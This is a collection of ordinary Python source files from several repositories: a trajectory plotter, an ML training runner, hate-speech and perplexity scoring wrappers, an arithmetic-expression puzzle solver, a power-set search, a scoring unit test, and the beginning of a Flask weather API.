except getopt.GetoptError:
        print('plotTrajectory.py -i <dataToPlotFile> -o <hardCopyFileName>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
            print('plotTrajectory.py -i <dataToPlotFile> -o <hardCopyFileName>')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
    print('File with data to plot <input file> is:', inputfile)
    print('Filename of hard copy file <output file> is:', outputfile)
# --- Reading data
t0,posx,posy,posz,ux,uy,uz = \
np.loadtxt(open(inputfile,'rt').readlines()[:-1], delimiter='\t', skiprows=12, unpack=True);
# --- Creating plot
#fig = plt.figure()
#ax = fig.add_subplot(projection='3d')
#scatter = ax.scatter(posx,posy,posz,c=posz,cmap='viridis',alpha=0.75)
# legend1 = ax.legend(*scatter.legend_elements(),
# loc="upper left", title=r"$z-$Position of a Cyclotron Trajectory",fontsize=12)
#ax.add_artist(legend1)
fig = plt.figure(figsize=(6,4.5), dpi=144)
ax = Axes3D(fig);
line = plt.plot(posx,posy,posz,lw=0.2,c='k')[0]
ax.view_init(azim=44.5,elev=15.)
ax.grid(True)
ax.set_xlabel(r'$x-$Position',fontsize=12)
ax.set_ylabel(r'$y-$Position',fontsize=12);
ax.set_zlabel(r'$z-$Position',fontsize=12);
# string01 = '$\max(\phi) = ' + str(np.amax(col07)) + '$'
# string02 = '$\min(\phi) = ' + str(np.amin(col07)) + '$'
# ax.text(2, 80.0, r"$\Pi_1 = \frac{p\,\rho\,c_0^2}{\mu}$", color="k", fontsize=18)
# ax.text(2, 74.0, r"$\Pi_2 = \frac{p\,c_0}{h_0}$", color="k", fontsize=18)
# ax.text(2, 68.0, r"$\mu = 1.3e-2, \, \rho=1005.0$", color="k", fontsize=18)
# ax.text(2, 60.0, string01, color="k", fontsize=18)
# ax.text(2, 55.0, string02, color="k", fontsize=18)
plt.show()
# -----------------------------------------------------------------
# Main function call
if __name__ == "__main__":
if (len(sys.argv)>1):
main(sys.argv[1:]);
else:
print('Please provide input file to plot.')
        print('plotTrajectory.py -i <dataToPlotFile> -o <hardCopyFileName>')
# End of main function call
# -----------------------------------------------------------------
``` |
{
"source": "josephdviviano/omsignal",
"score": 2
} |
#### File: josephdviviano/omsignal/main.py
```python
import datetime
import logging
import pickle
import torch
import os
import experiments
import utils
import visualize
PKG_PATH = os.path.dirname(os.path.abspath(__file__))
# Adds a simple logger.
TSTAMP = datetime.datetime.now().strftime("%d%m%y_%Hh%M")
LOGNAME = os.path.join(PKG_PATH, 'logs/train_{}.log'.format(TSTAMP))
logging.basicConfig(filename=LOGNAME, level=logging.INFO)
LOGGER = logging.getLogger('train')
def main():
# Run model.
model, results = experiments.tspec()
# Plot training curves.
visualize.training(results)
# Save model.
torch.save(model,
os.path.join(PKG_PATH,
'models/best_tspec_model_{}.pt'.format(TSTAMP)))
# Save results.
utils.write_results(results,
os.path.join(PKG_PATH,
'models/best_tspec_results_{}.pkl'.format(TSTAMP)))
# Visualizations using non-shuffled data.
train_data = utils.Data(train=True, augmentation=True)
valid_data = utils.Data(train=False, augmentation=False)
visualize.spectra(train_data, log=False, name='spectra_train')
visualize.spectra(valid_data, log=False, name='spectra_valid')
visualize.timeseries(train_data, name='timeseries_train')
visualize.timeseries(valid_data, name='timeseries_valid')
visualize.pca(train_data)
visualize.tsne(train_data)
if __name__ == "__main__":
main()
``` |
{
"source": "josephdviviano/whatsinthebox",
"score": 2
} |
#### File: witb/utils/models.py
```python
from hatesonar import Sonar
from transformers import AutoTokenizer, AutoModelForSequenceClassification
import numpy as np
import pandas as pd
import torch
import torch.multiprocessing
import time
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
import os
import multiprocessing
torch.multiprocessing.set_sharing_strategy('file_system')
#from cc_net import dedup, execution, jsonql, minify, perplexity, process_wet_file, text_normalizer
from witb.utils.textutils import normalize_line
import kenlm # type: ignore
import sentencepiece # type: ignore
from copy import copy
#class PerplexityRunner():
# def __init__():
class SonarRunner():
def __init__(self, threshold=20):
self._model = Sonar()
self.labels = {
'neither': 0,
'offensive_language': 1,
'hate_speech': 2}
self.threshold = threshold
def query(self, doc):
"""Runs all sentences across cores."""
labels = np.zeros(len(self.labels)) # Per sentence counts of labels.
scores = np.zeros(len(self.labels)) # Mean score per label.
# Remove short sentences.
sentences = [s for s in doc.sentences if len(s) > self.threshold]
n = len(sentences)
if n == 0:
return np.concatenate([labels, scores])
for sentence in sentences:
result = self._model.ping(text=sentence)
labels[self.labels[result['top_class']]] += 1 # Top class count.
if result['top_class'] == 'hate_speech':
print("SONAR ", sentence)
# Gets the numeric score for each class per sentence.
for r in result['classes']:
scores[self.labels[r['class_name']]] += r['confidence']
scores /= n # Take the mean.
return np.concatenate([labels, scores])
class DeLimitRunner():
def __init__(self, threshold=20, max_sentences=30):
self._model = AutoModelForSequenceClassification.from_pretrained(
"Hate-speech-CNERG/dehatebert-mono-english")
self.labels = {
'hate_speech': 0,
'normal': 1}
self._tokenizer = AutoTokenizer.from_pretrained(
"Hate-speech-CNERG/dehatebert-mono-english")
self.threshold = threshold
self.max_sentences = int(max_sentences)
self._n_cpu = multiprocessing.cpu_count()
if torch.cuda.is_available():
self._device = torch.device("cuda")
else:
self._device = torch.device('cpu')
self._model.to(self._device)
self._softmax = torch.nn.Softmax(dim=1)
def query(self, doc):
"""Runs all sentences across cores."""
os.environ['TOKENIZERS_PARALLELISM'] = 'false'
labels = np.zeros(len(self.labels)) # Per sentence counts of labels.
scores = np.zeros(len(self.labels)) # Mean score per label.
# Preprocess sentences (filter, add delimiters, tokenize).
# Sentences must be > 20 characters.
sentences = [s for s in doc.sentences if len(s) > self.threshold]
# Do the first n sentences only so we cap runtime.
if len(sentences) > self.max_sentences:
sentences = sentences[:self.max_sentences]
raw_sentences = copy(sentences)
sentences = ["[CLS] " + s + " [SEP]" for s in sentences]
sentences = [self._tokenizer.tokenize(
s, padding='max_length', truncation=True) for s in sentences]
sentences = [
self._tokenizer.convert_tokens_to_ids(s) for s in sentences]
n = len(sentences)
# Create attention masks (check if this works correctly)
attention_masks = []
for sentence in sentences:
attention_masks.append([float(s > 0) for s in sentence])
if n == 0:
return np.concatenate([labels, scores])
dataset = TensorDataset(torch.LongTensor(sentences),
torch.LongTensor(attention_masks))
sampler = SequentialSampler(dataset)
dataloader = DataLoader(dataset,
sampler=sampler,
batch_size=self.max_sentences,
num_workers=1)
for i, batch in enumerate(dataloader):
sentence, mask = batch
sentence = sentence.to(self._device)
mask = mask.to(self._device)
with torch.no_grad():
logits = self._model(
sentence, token_type_ids=None, attention_mask=mask)[0]
softmax = self._softmax(logits).detach().cpu().numpy()
# Count sentences with each label.
idx = np.argmax(softmax, axis=1)
_labels = np.zeros(softmax.shape)
_labels[np.arange(_labels.shape[0]), idx] = 1
labels += _labels.sum(0)
# Get the hateful/nice sentences:
batch_size = sentence.shape[0]
batch_idx = np.arange(batch_size*i, batch_size*(i+1))
hate_idx = batch_idx[np.where(idx == 1)[0]]
nice_idx = batch_idx[np.where(idx == 0)[0]]
if len(hate_idx) > 0:
print("DELIMIT HATE:", np.array(raw_sentences)[hate_idx])
#print("DELIMIT NICE:", np.array(raw_sentences)[nice_idx])
#print('\n')
scores += softmax.sum(0) # Sum scores over batch dimension.
scores /= n # Take the mean.
return np.concatenate([labels, scores])
class PerplexRunner():
def __init__(self, threshold=20):
#TODO: generalize these paths.
self.sp_model = sentencepiece.SentencePieceProcessor(
'/home/mila/l/lucciona/cc_net/data/lm_sp/en.sp.model')
self._model= kenlm.Model(
'/home/mila/l/lucciona/cc_net/data/lm_sp/en.arpa.bin')
self.threshold = threshold
    @staticmethod
    def pp(log_score, length):
        # Perplexity from a summed log10 score, matching the formula in query().
        return 10.0 ** (-log_score / length)
def query(self, doc):
"""Runs all sentences across cores."""
# Remove short sentences.
sentences = [s for s in doc.sentences if len(s) > self.threshold]
n = len(sentences)
        score = 0.0
if n == 0:
            return -np.inf  # Sentinel for documents with no scorable sentences.
log_score, doc_length = 0, 0
for sentence in sentences:
sentence = normalize_line(sentence)
            sentence = self.sp_model.encode_as_pieces(sentence)
log_score += self._model.score(" ".join(sentence))
doc_length += len(sentence) + 1
#score = (10.0 ** (-log_score / doc_length))
score = round(10.0 ** (-log_score/doc_length), 1)
return score
``` |
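The document perplexity used by PerplexRunner, isolated as a pure function: log_score is the summed kenlm log10 score and doc_length counts sentencepiece tokens plus one per sentence; the sample numbers are illustrative:

```python
def perplexity(log_score: float, doc_length: int) -> float:
    return round(10.0 ** (-log_score / doc_length), 1)

print(perplexity(log_score=-250.0, doc_length=100))  # 316.2
```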
{
"source": "josephedradan/algorithms",
"score": 4
} |
#### File: algorithms/mathematics/find_all_possible_arithmetic_expressions_and_solve.py
```python
from __future__ import annotations
import traceback
from collections import defaultdict
from itertools import permutations, combinations_with_replacement, chain
from numbers import Real
from typing import Union, Set, Dict
class ArithmeticExpression:
"""
Arithmetic Expression that returns a value
"""
def __init__(self,
operand_lhs: Union[Real, ArithmeticExpression],
operand_rhs: Union[Real, ArithmeticExpression],
operator: str):
# Operands
self.operand_lhs = operand_lhs
self.operand_rhs = operand_rhs
# Operators
self.operator = operator
def __add__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "+")
def __sub__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "-")
def __mul__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "*")
def __truediv__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "/")
def __floordiv__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "//")
def __pow__(self, power: Union[Real, ArithmeticExpression], modulo=None) -> ArithmeticExpression:
return ArithmeticExpression(self, power, "**")
def __mod__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "%")
def __str__(self) -> str:
return "({}{}{})".format(self.operand_lhs, self.operator, self.operand_rhs)
def __repr__(self) -> str:
return self.__str__()
    def __hash__(self) -> int:
return hash(self.__str__())
def get_result(self) -> Union[Real, ArithmeticExpression]:
"""
Returns the result of the Arithmetic Expression
:return: a number
"""
if isinstance(self.operand_lhs, ArithmeticExpression):
lhs: Union[Real, ArithmeticExpression] = self.operand_lhs.get_result()
else:
lhs: Real = self.operand_lhs
if isinstance(self.operand_rhs, ArithmeticExpression):
rhs: Union[Real, ArithmeticExpression] = self.operand_rhs.get_result()
else:
rhs: Real = self.operand_rhs
return simplify_expression(lhs, rhs, self.operator)
def __copy__(self) -> Union[Real, ArithmeticExpression]:
"""
Returns a copy of the current expression.
Not used
:return: ArithmeticExpression object
"""
if isinstance(self.operand_lhs, ArithmeticExpression):
lhs: Union[Real, ArithmeticExpression] = self.operand_lhs.__copy__()
else:
lhs = self.operand_lhs
if isinstance(self.operand_rhs, ArithmeticExpression):
rhs: Union[Real, ArithmeticExpression] = self.operand_rhs.__copy__()
else:
rhs = self.operand_rhs
return ArithmeticExpression(lhs, rhs, self.operator)
def get_list_permutation(list_given: list) -> list:
"""
    Return a list of permutations of list_given
:param list_given: a list given
:return: list of permutations
"""
return list(permutations(list_given))
def get_list_combination_with_replacement(list_given: Union[list, set], size) -> list:
"""
Return a list combinations with replacement from list_given
:param list_given: a list given
:return: list of combinations with replacement
"""
return list(combinations_with_replacement(list_given, size))
def get_list_list_item_mathematical_permutate_operators(list_permutation_operands, list_permutation_operators):
"""
For every list that is a permutation of operands, interweave every list that is a permutation of operators
within it.
Example:
[1, 2, 3, 4]
[+, -, *]
[+, *, -]
[-, +, *]
[-, *, +]
[*, +, -]
[*, -, +]
[1, 3, 2, 4]
[+, -, *]
[+, *, -]
...
etc...
Result:
[1, +, 2, -, 3, *, 4]
[1, +, 2, *, 3, -, 4]
...
[1, *, 2, -, 3, +, 4]
[1, +, 3, -, 2, *, 4]
[1, +, 3, *, 2, -, 4]
...
[1, *, 3, -, 2, +, 4]
etc...
:param list_permutation_operands: list containing a list of operands
:param list_permutation_operators: list containing a list of operators
:return: List containing list of alternating operands and operators
"""
# List containing lists where the inner lists contain mathematical items (operands and operators)
list_list_item_mathematical = []
# Loop through list_permutation_operands
for permutation_operands in list_permutation_operands:
# print(permutation_operands)
# Loop through list_permutation_operators
for permutation_operators in list_permutation_operators:
# print("\t", permutation_operators)
# Make a list containing mathematical items
list_item_mathematical = []
# Loop through permutation_operands getting the operands and its indices
for index, operand in enumerate(permutation_operands):
# Add operand to list_item_mathematical
list_item_mathematical.append(operand)
# If the index of the operand is the last one
if index == len(permutation_operands) - 1:
# print("\t\t", list_item_mathematical)
# Add a copy of list_item_mathematical into list_list_item_mathematical
list_list_item_mathematical.append(list_item_mathematical.copy())
break
# Add operator to list_item_mathematical
list_item_mathematical.append(permutation_operators[index])
# Return list of list of item mathematical
return list_list_item_mathematical
def simplify_list_item_mathematical(list_item_mathematical: list) -> Real:
"""
Apply mathematical operations on the operands and reduce to 1 value
Not Used
:param list_item_mathematical: list of mathematical items
:return: value
"""
# Current value
value = None
# Current Operator
operator_current = None
# If operator is used already
operator_used = None
# Loop through every item in list_item_mathematical
for item in list_item_mathematical:
# Check if item is a string which should be an operator
if isinstance(item, str):
operator_current = item
operator_used = False
# If not a string then it's a number
else:
# If value is None initially
if value is None:
value = item
# Do math of with the operand and the operator if the current operator is not used
if operator_used is False:
value = simplify_expression(value, item, operator_current)
operator_used = True
# Return value
return value
def dfs_permutations_expression_arithmetic_priority(list_item_mathematical: list,
list_arithmetic_expression: list = None):
"""
Given a list of mathematical items, find all permutations of the order in which each arithmetic expression,
a combination of 2 operands and 1 operator, will be evaluated first. Each arithmetic expression is created via dfs
method.
Notes:
list_item_mathematical MUST NOT BE A GENERATOR
Example:
1 + 2 * 3
Result:
((1 + 2) * 3)
(1 + (2 * 3))
# Doctest function call
>>> dfs_permutations_expression_arithmetic_priority([1, "+", 2, "*", 3])
[((1+2)*3), (1+(2*3))]
:param list_item_mathematical: list of mathematical items
    :param list_arithmetic_expression: list of arithmetic expressions
:return:
"""
# Reset variables for reuse of the function
if list_arithmetic_expression is None:
list_arithmetic_expression = []
# Loop through mathematical items in list_item_mathematical
for index, item in enumerate(list_item_mathematical):
# If item is a string then it's probably an operator
if isinstance(item, str):
# Assume item is an operator
operator = item
# lhs and rhs operands
lhs = list_item_mathematical[index - 1]
rhs = list_item_mathematical[index + 1]
# Create a list similar to list_item_mathematical but also hosts a new object called ArithmeticExpression
list_list_item_mathematical_with_expression_arithmetic = []
# Loop through mathematical items in list_item_mathematical again
for index_2, item_2 in enumerate(list_item_mathematical):
# If index_2 is in [index - 1, index, index + 1]
if index_2 in [index - 1, index, index + 1]:
# If index_2 and index match
if index_2 == index:
"""
Create and add the ArithmeticExpression to
list_list_item_mathematical_with_expression_arithmetic
"""
list_list_item_mathematical_with_expression_arithmetic.append(
ArithmeticExpression(lhs, rhs, operator))
# *Continue only when we pass the three indices where the middle index == index_2
continue
"""
*Add the mathematical item to list_list_item_mathematical_with_expression_arithmetic assuming that
                we have already passed, or have not yet reached, the 3 mathematical items that are merged into a
                single ArithmeticExpression.
"""
list_list_item_mathematical_with_expression_arithmetic.append(item_2)
# If the size of list_list_item_mathematical_with_expression_arithmetic is 1
if len(list_list_item_mathematical_with_expression_arithmetic) == 1:
# print((list_list_item_mathematical_with_expression_arithmetic[0]))
"""
Add the first object in list_list_item_mathematical_with_expression_arithmetic to
list_arithmetic_expression
This means that the item is just 1 Arithmetic Expression object
"""
list_arithmetic_expression.append(list_list_item_mathematical_with_expression_arithmetic[0])
# Recursive Call ONLY when there is not 1 item in the list_list_item_mathematical_with_expression_arithmetic
else:
dfs_permutations_expression_arithmetic_priority(list_list_item_mathematical_with_expression_arithmetic,
list_arithmetic_expression)
return list_arithmetic_expression
def simplify_expression(operand_lhs: Real, operand_rhs: Real, operator: str) -> Real:
"""
Given lhs operand, rhs operand, and operator, simplify the expression or solve
WARNING:
        Don't use the dict approach (commented out below): it evaluates every operation eagerly, regardless of which key is requested
:param operand_lhs: lhs operand
:param operand_rhs: rhs operand
:param operator: operator
:return: result of the expression
"""
# key = {"+": operand_lhs + operand_rhs,
# "-": operand_lhs - operand_rhs,
# "*": operand_lhs * operand_rhs,
# "/": operand_lhs / operand_rhs
# }
# return key.get(operator)
# Result is currently None
result = None
# Get the result of the operation
try:
if operator == "+":
result = operand_lhs + operand_rhs
elif operator == "-":
result = operand_lhs - operand_rhs
elif operator == "*":
result = operand_lhs * operand_rhs
elif operator == "/":
result = operand_lhs / operand_rhs
elif operator == "//":
result = operand_lhs // operand_rhs
elif operator == "**":
result = operand_lhs ** operand_rhs
elif operator == "%":
result = operand_lhs % operand_rhs
except ZeroDivisionError as e:
# print("Cannot do {} / {} ".format(operand_lhs, operand_rhs))
pass
except OverflowError as e:
# print("Result it too big!")
pass
except TypeError as e:
# print("Mathematical operation can be be done with operands {} and {}".format(operand_lhs, operand_rhs))
pass
except Exception as e:
print(e)
print(traceback.print_exc())
# Return the result
return result
def get_dict_key_result_value_set_arithmetic_expression(
list_operands, list_operators,
treat_list_operators_as_allowed_to_use=False) -> Dict[Real, Set[ArithmeticExpression]]:
"""
Given a list of operands and a list of operators, find all possible permutations of these mathematical items, then
solve.
:param list_operands: list of operands
:param list_operators: list of operators
    :param treat_list_operators_as_allowed_to_use: Treat the list of operators as a pool the algorithm may draw from
        (with repetition) rather than a fixed sequence in which each operator is used exactly once.
:return: dictionary of result of the expression and the expression
"""
"""
List of list of operands as permutations
Notes:
Alternatively, permutations can be called instead of get_list_permutation which should be less memory intensive
optimal.
"""
permutations_operands = permutations(list_operands)
# List of list of operators as combinations with replacement
if treat_list_operators_as_allowed_to_use:
"""
Get every combination with replacement of operators within list_operators
Notes:
Alternatively, combinations_with_replacement can be called here instead because the set function below this
variable will make this not exhaustible.
"""
list_list_operators_every_combination = combinations_with_replacement(set(list_operators),
len(list_operands) - 1)
"""
    *** Get every permutation of every combination from list_list_operators_every_combination into 1 chain object
of type iterable, then remove duplicate permutations by putting them into a set.
"""
list_list_operators = set(chain(*[permutations(i) for i in list_list_operators_every_combination]))
# print(set(list_list_operators))
# List of list of operators as permutations
else:
# list_list_operators needs to be not exhaustible because it will be reused over again
list_list_operators = get_list_permutation(list_operators)
# Get list of list of mathematical items
list_list_item_mathematical = get_list_list_item_mathematical_permutate_operators(permutations_operands,
list_list_operators)
# Default dict of Key result of expression amd Value set that contains Arithmetic Expression
dict_result_arithmetic_expression = defaultdict(set)
# For list of mathematical items
for list_item_mathematical in list_list_item_mathematical:
# Get a list Arithmetic Expressions which are objects represent a list_item_mathematical
list_arithmetic_expression = dfs_permutations_expression_arithmetic_priority(list_item_mathematical)
# For every Arithmetic Expression
for arithmetic_expression in list_arithmetic_expression:
# print(f"Arithmetic Expression: {arithmetic_expression}")
# print(f"Arithmetic Expression Result: {arithmetic_expression.get_return()}")
# Add result of Arithmetic Expression as a Key and the Arithmetic Expression its set
dict_result_arithmetic_expression[arithmetic_expression.get_result()].add(arithmetic_expression)
# Return dict_result_arithmetic_expression
return dict_result_arithmetic_expression
def solve_problem(target=24):
"""
Solve the problem posed in the video "Can you solve this puzzle. Make 24 from 6 4 3 and 1."
(https://www.youtube.com/watch?v=Jnf18uqZRyw)
:param target: Value to reach
:return: None
"""
operands = [6, 4, 3, 1]
operators = ["+", "-", "*", "/"]
dict_results = get_dict_key_result_value_set_arithmetic_expression(operands, operators,
treat_list_operators_as_allowed_to_use=True)
set_solution = dict_results.get(target, None)
print(f"Target is {target}")
if set_solution is None:
print("Target could not be found!")
print("Solution does not exist")
else:
print("Possible solutions are:")
for expression in set_solution:
print("\t{} = {}".format(expression, expression.get_result()))
print("\n" + 100 * "-" + "\n")
print("All Permutations of Operands, Operators, and Order of Operations:")
for key, value in dict_results.items():
print(key)
for expression in value:
print("\t{}".format(expression))
print()
def test_example():
"""
    Show all Arithmetic Expressions and their corresponding results
:return: None
"""
operands = [6, 4, 3, 1]
operators = ["+", "-", "*", "/", "**", "//", "%"]
dict_results = get_dict_key_result_value_set_arithmetic_expression(operands, operators,
treat_list_operators_as_allowed_to_use=True)
total_expressions = 0
for key, value in dict_results.items():
print(key)
for expression in value:
total_expressions += 1
print("\t{}".format(expression))
print()
print(f"Total solutions: {len(dict_results)}")
print(f"Total expressions: {total_expressions}")
if __name__ == '__main__':
solve_problem()
print("\n" + 100 * "-" + "\n")
test_example()
```
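One known solution to the 6, 4, 3, 1 puzzle, built by hand to show the ArithmeticExpression API in isolation:

```python
inner = ArithmeticExpression(3, 4, "/")       # (3/4)
outer = ArithmeticExpression(1, inner, "-")   # (1-(3/4))
answer = ArithmeticExpression(6, outer, "/")  # (6/(1-(3/4)))
print(answer, "=", answer.get_result())       # (6/(1-(3/4))) = 24.0
```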
#### File: search/depth_first_search/depth_first_search_power_set.py
```python
from typing import Set, FrozenSet, List
# from joseph_resources.decorators._old.callable_called_count import print_callable_called_count, callable_called_count
# from joseph_resources.decorators.timer import timer
# @timer
def get_power_set(list_given: list) -> List[set]:
"""
Given a list, find the power set of it which is basically all the combinations for all
sizes from 0 to length of list_given
:param list_given: list given
:return: list of a list of solutions
"""
# Set containing frozensets which are solutions
set_frozenset_shared_solutions = set() # type: Set[FrozenSet]
# A Temp list that can potentially be a solution
list_temp_shared_generic_solution = [] # type: list
# Recursive DFS call
_get_power_set_helper(list_temp_shared_generic_solution, list_given, set_frozenset_shared_solutions)
# Convert frozen set with a tuple
list_sets = [set(i) for i in set_frozenset_shared_solutions]
# Add the empty set
list_sets.append(set())
# Sort the list
list_sets.sort()
return list_sets
# @callable_called_count
def _get_power_set_helper(list_temp_shared_generic_solution: list,
list_remaining_items: list,
set_frozenset_shared_solutions: set) -> None:
"""
    Recursive DFS that enumerates permutations of a list, deduplicated via frozenset so each stored result is a combination
    Notes: The iteration count is one less than the totals below because the empty set is never generated recursively
Total iterations (Permutation formula):
Less than (Due to not Recursive calling for an empty list_remaining_items)
Summation from r = 0 to n of (n!)/((n-r)!)
where r = sample size == len(list_remaining_items)
n = number of objects == len(list_remaining_items)
(n!)/((n-r)!) = permutation formula
Power Set iterations:
Greater than
Summation from r = 0 to n of (n!)/(r!(n-r)!) ==
2^(len(list_remaining_items))
where r = sample size == len(list_remaining_items)
n = number of objects == len(list_remaining_items)
(n!)/(r!(n-r)!) = combination formula
:param list_temp_shared_generic_solution: Temporary List of the current permutation (temp List is shared)
:param list_remaining_items: List of remaining items that need to be added to list_temp_shared_generic_solution
:param set_frozenset_shared_solutions: Set of a frozensets that are to solutions
:return: None
"""
# Loop through the length of list_remaining_items
for i in range(len(list_remaining_items)):
# Add the indexed item into the temp List
list_temp_shared_generic_solution.append(list_remaining_items[i])
# Create a copy of list_remaining_items
list_remaining_items_new = list_remaining_items.copy()
# Pop off the item with the index number
list_remaining_items_new.pop(i)
# Add a frozenset (immutable) which is hashable in a set (mutable)
set_frozenset_shared_solutions.add(frozenset(list_temp_shared_generic_solution))
# Don't recursive call if list_remaining_items_new is empty because you loop for no reason with a range(0)
if list_remaining_items_new:
# Recursive call into this function
_get_power_set_helper(list_temp_shared_generic_solution,
list_remaining_items_new,
set_frozenset_shared_solutions)
# Pop from list_temp_permutation for a new permutation
list_temp_shared_generic_solution.pop()
def test_example():
solution = get_power_set([1, 2, 3, 4, 5])
for i in solution: print(i)
print(len(solution))
# print_callable_called_count()
"""
Callable: get_power_set
Callable ran in 0.001001119613647461 Sec
set()
{1, 3, 5}
{1, 4}
{2}
{3}
{2, 3}
{4}
{3, 4}
{2, 4}
{2, 3, 4}
{4, 5}
{1}
{5}
{3, 5}
{2, 3, 5}
{3, 4, 5}
{1, 3}
{1, 2, 3}
{1, 3, 4}
{1, 5}
{1, 4, 5}
{1, 2}
{2, 5}
{2, 4, 5}
{1, 2, 4, 5}
{2, 3, 4, 5}
{1, 2, 5}
{1, 2, 4}
{1, 2, 3, 4}
{1, 3, 4, 5}
{1, 2, 3, 5}
{1, 2, 3, 4, 5}
32
Callable: _get_power_set_helper
Callable Call Count: 206
"""
if __name__ == '__main__':
test_example()
``` |
{
"source": "josephedwardchang/digitalbuildings",
"score": 2
} |
#### File: tests/dimensions/dimension_test.py
```python
from absl.testing import absltest
from validate import handler as validator
from validate.generate_universe import BuildUniverse
from validate.entity_instance import EntityInstance
from score.dimensions.dimension import Dimension
import copy
def canonical_entity() -> EntityInstance:
entity = list(
validator.Deserialize(['tests/samples/canonical_entity.yaml'
])[0].values())[0]
# Append the type to be checked by is_entity_canonical()
entity.type = BuildUniverse(use_simplified_universe=True).GetEntityType(
entity.namespace, entity.type_name)
return entity
def noncanonical_entity() -> EntityInstance:
entity = list(
validator.Deserialize(['tests/samples/noncanonical_entity.yaml'
])[0].values())[0]
# Append the type to be checked by is_entity_canonical()
entity.type = BuildUniverse(use_simplified_universe=True).GetEntityType(
entity.namespace, entity.type_name)
return entity
class DimensionTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.dimension = Dimension(translations='translations')
self.dimension.correct_virtual = 1
self.dimension.correct_reporting = 1
self.dimension.correct_ceiling_virtual = 2
self.dimension.correct_ceiling_reporting = 2
self.dimension.incorrect_virtual = 1
self.dimension.incorrect_reporting = 1
self.dimension_none = Dimension(deserialized_files='deserialized files')
self.dimension_none.correct_virtual = 0
self.dimension_none.correct_reporting = 0
self.dimension_none.correct_ceiling_virtual = 0
self.dimension_none.correct_ceiling_reporting = 0
self.dimension_none.incorrect_virtual = 0
self.dimension_none.incorrect_reporting = 0
self.dimension_override = copy.copy(self.dimension)
self.entities = {
'canonical_type_appended':
canonical_entity(),
'noncanonical_type_appended':
noncanonical_entity(),
'reporting':
list(
validator.Deserialize(['tests/samples/reporting_entity.yaml'
])[0].values())[0],
'virtual':
list(
validator.Deserialize(['tests/samples/virtual_entity.yaml'
])[0].values())[0],
}
def testArgumentAttributes(self):
self.assertEqual(self.dimension.translations, 'translations')
self.assertEqual(self.dimension.deserialized_files, None)
self.assertEqual(self.dimension_none.translations, None)
self.assertEqual(self.dimension_none.deserialized_files,
'deserialized files')
def testCategoryAttribute_None(self):
self.assertEqual(Dimension.category, None)
self.assertEqual(self.dimension.category, None)
def testArgumentExclusivity(self):
with self.assertRaises(Exception) as not_enough:
Dimension()
self.assertEqual(
not_enough.exception.args[0],
'`translations` xor `deserialized_files` argument is required')
with self.assertRaises(Exception) as too_many:
Dimension(translations='translations',
deserialized_files='deserialized files')
self.assertEqual(
too_many.exception.args[0],
'`translations` or `deserialized_files` argument must be exclusive')
def testCorrectTotal(self):
self.assertEqual(self.dimension.correct_total(), 2)
self.assertEqual(self.dimension_none.correct_total(), 0)
self.assertEqual(self.dimension.correct_total_override, None)
self.dimension.correct_total_override = 4
self.assertEqual(self.dimension.correct_total_override, 4)
def testCorrectCeiling(self):
self.assertEqual(self.dimension.correct_ceiling(), 4)
self.assertEqual(self.dimension_none.correct_total(), 0)
self.assertEqual(self.dimension_override.correct_ceiling_override, None)
self.dimension_override.correct_ceiling_override = 8
self.assertEqual(self.dimension_override.correct_ceiling_override, 8)
def testIncorrectTotal(self):
self.assertEqual(self.dimension.incorrect_total(), 2)
self.assertEqual(self.dimension_none.correct_total(), 0)
self.assertEqual(self.dimension_override.incorrect_total_override, None)
self.dimension_override.incorrect_total_override = 4
self.assertEqual(self.dimension_override.incorrect_total_override, 4)
def testResultComposite(self):
self.assertEqual(self.dimension.result_all, 0.0)
self.assertEqual(self.dimension_none.result_all, None)
self.assertEqual(self.dimension_override.result_all, 0.0)
def testResultVirtual(self):
self.assertEqual(self.dimension.result_virtual, 0.0)
self.assertEqual(self.dimension_none.result_virtual, None)
def testResultReporting(self):
self.assertEqual(self.dimension.result_reporting, 0.0)
self.assertEqual(self.dimension_none.result_reporting, None)
def testEntityIsCanonical(self):
self.assertTrue(
Dimension.is_entity_canonical(self.entities['canonical_type_appended']))
self.assertFalse(
Dimension.is_entity_canonical(
self.entities['noncanonical_type_appended']))
# This entity has had a type of `None` appended, thus it returns false.
reporting_type_none = copy.copy(self.entities['reporting'])
reporting_type_none.type = None
self.assertFalse(Dimension.is_entity_canonical(reporting_type_none))
def testEntityIsReporting(self):
self.assertTrue(Dimension.is_entity_reporting(self.entities['reporting']))
self.assertFalse(Dimension.is_entity_reporting(self.entities['virtual']))
def testEntityIsVirtual(self):
self.assertTrue(Dimension.is_entity_virtual(self.entities['virtual']))
self.assertFalse(Dimension.is_entity_virtual(self.entities['reporting']))
def testStr(self):
self.assertEqual(
str(self.dimension),
'{result_all: 0.00, result_virtual: 0.00, result_reporting: 0.00}')
if __name__ == '__main__':
absltest.main()
``` |
{
"source": "josephedward/surf_sqlalchemy_flask",
"score": 3
} |
#### File: josephedward/surf_sqlalchemy_flask/app.py
```python
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
Base = automap_base()
Base.prepare(engine, reflect=True)
m_table_ref = Base.classes.measurement
s_table_ref = Base.classes.station
app = Flask(__name__)
@app.route("/")
def home():
print("List all available api routes")
return (f"Available Routes:<br/><br/>"
# f"Precipitation Data for Aug 2016 - Aug 2017: <br/>"
f'All Precipitation Data: <br/><br/>'
f"/precipitation_2016_2017<br/><br/>"
f"List of Stations: <br/><br/>"
f"/station_list<br/><br/>"
f"List of Temperatures at Waihee for Aug 2016 - Aug 2017: <br/><br/>"
f"/temperatures_waihee<br/><br/>"
f"Min, Max, and Avg Temperatures from date yyyy-mm-dd:<br/><br/>"
